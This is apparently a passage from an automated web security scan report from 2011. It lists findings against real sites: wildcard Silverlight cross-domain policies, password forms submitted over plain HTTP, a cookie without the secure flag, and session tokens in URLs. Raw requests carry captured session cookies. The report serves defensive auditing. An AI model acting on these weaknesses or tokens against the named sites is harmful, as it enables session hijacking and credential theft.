Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www328
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www273
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www647
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://everquest2.com/free_to_play  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...

7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/webforms/cta/signinmainjs.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /system/js/webforms/cta/signinmainjs.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 22:26:23 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:25 GMT
Vary: Accept-Encoding
Content-Length: 32444

var envURL = "";
var postURL;
var targetURL;
var newenvURL="";
var newenvURL1="";

function signInSelect(formName) {
   //alert(formName);
   var userSelect = document.getElementById("signinOption
...[SNIP]...
<body onLoad='javascript:document.getElementById(\"loginForm\").submit()'><form id='loginForm' action='" + mlURL + "' method='POST'>";
               mlFormhtml += "<div style='display:none'>
...[SNIP]...
<input type='text' id='USER' name='USER' value='" + esrvUserName + "'/>";
       eservFormhtml += "<input type='password' id='PASSWORD' name='PASSWORD' value='" + esrvPassword + "'/>";
       eservFormhtml += "<input type='hidden' name='SMENC' value='ISO-8859-1'/>
...[SNIP]...

7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/550-Paket-BlackBerry-Pilihan.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/blackberry/550-Paket-BlackBerry-Pilihan.html HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975; __utmz=80575250.1308921411.1.1.utmcsr=beta.telkom.co.id|utmccn=(referral)|utmcmd=referral|utmcct=/rss/SimplePie/index.php; __utma=80575250.1631938963.1308921411.1308921411.1308921411.1; __utmc=80575250; __utmb=80575250.1.10.1308921411

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:22:40 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 101727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...

7.4. http://www.telkomsel.com/product/blackberry/undefined  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/undefined

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/blackberry/undefined HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 96122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...

8. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

9. Session token in URL  previous  next
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

9.2. http://clicktoverify.truste.com/images/pos_btn3.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/pos_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/pos_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81d072-1958-d12736c0"
Accept-Ranges: bytes
Content-Length: 6488
Content-Type: image/png

.PNG
.
...IHDR.............N..g...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

9.3. http://clicktoverify.truste.com/images/watch_btn3.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/watch_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/watch_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81ce11-570-d12736c0"
Accept-Ranges: bytes
Content-Length: 1392
Content-Type: image/png

.PNG
.
...IHDR..............9'.....tEXtSoftware.Adobe ImageReadyq.e<....PLTETRP..b..:..R.....L...{.3........A..i..W........I........a..Y..^..z..W.....u..?.....6.._.....G..q.....?..S.....k..c..C.....
...[SNIP]...

9.4. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certi
...[SNIP]...
<div id="logo"><a href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=445d5b109b4f42ef794f06203204708d" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png"/>
...[SNIP]...

9.5. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=dc48a90a-d71a-4495-be5f-fba64a291740&hostname=www.gamersdailynews.com&location=%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&sessionID=1308921999537.90164&fpc=383617f-130c1d4b0b1-2c952677-1&ts1308922028876.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 24 Jun 2011 13:32:05 GMT
Connection: keep-alive


9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.silobreaker.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174&callback=_xdc_._w047jh&token=16347 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Fri, 24 Jun 2011 13:31:48 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._w047jh && _xdc_._w047jh( [1] )

9.7. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

9.8. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
